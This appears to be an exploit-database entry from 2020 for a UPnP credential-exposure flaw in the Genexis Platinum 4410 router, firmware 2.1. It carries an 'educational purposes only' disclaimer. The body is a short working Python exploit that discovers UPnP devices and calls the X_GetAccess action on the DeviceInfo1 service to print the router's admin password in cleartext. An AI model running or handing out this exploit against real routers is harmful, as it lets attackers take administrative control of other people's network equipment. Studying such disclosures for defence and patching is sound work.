Exploits / Vulnerability Discovered : 2020-11-19 |
Type : remote |
Platform : hardware
This exploit / vulnerability Genexis platinum 4410 router 2.1 upnp credential exposure is for educational purposes only and if it is used you will do on your own risk!
# Discover UPnP devices on the network
# Returns a list of devices e.g.: [Device <Econet IGD>]
devices = upnp.discover()
# Select the device directly from the list
device = devices[0]
# Get the services available for this device
# Returns a list of services available for the device
# device.get_services()
# We can now access a specific service on the device by its ID like a dictionary
service = device['DeviceInfo1']
# Execute the action by its name (in our case, the 'X_GetAccess' action)
# Returns a dictionary containing the cleartext password of 'admin' user.
print("Admin Password: {}".format(service.X_GetAccess()['NewX_RootPassword']))